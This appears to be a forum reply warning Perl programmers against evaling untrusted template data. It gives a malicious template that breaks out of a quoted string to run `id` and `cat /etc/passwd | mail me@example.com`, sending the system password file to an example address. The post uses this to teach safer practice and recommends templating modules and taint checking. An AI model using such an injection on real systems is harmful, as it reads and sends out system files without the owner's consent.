Be very careful just blindly evaling data you do not explicitely trust. Consider:
__END__
Hello $hello,
Your ID information: } . `id` .
`cat /etc/passwd | mail me@example.com` .
qq{
Thanks for your password!
I highly recommend either going with existing templating modules or rolling your own quick interpolation if all you need is something simple. This is discussed in the other threads mentioned in Adam's post below.
I also very much recommend using taint checking (-T) when dealing with untrusted, potentially malicious data, which would catch potential problems like this. |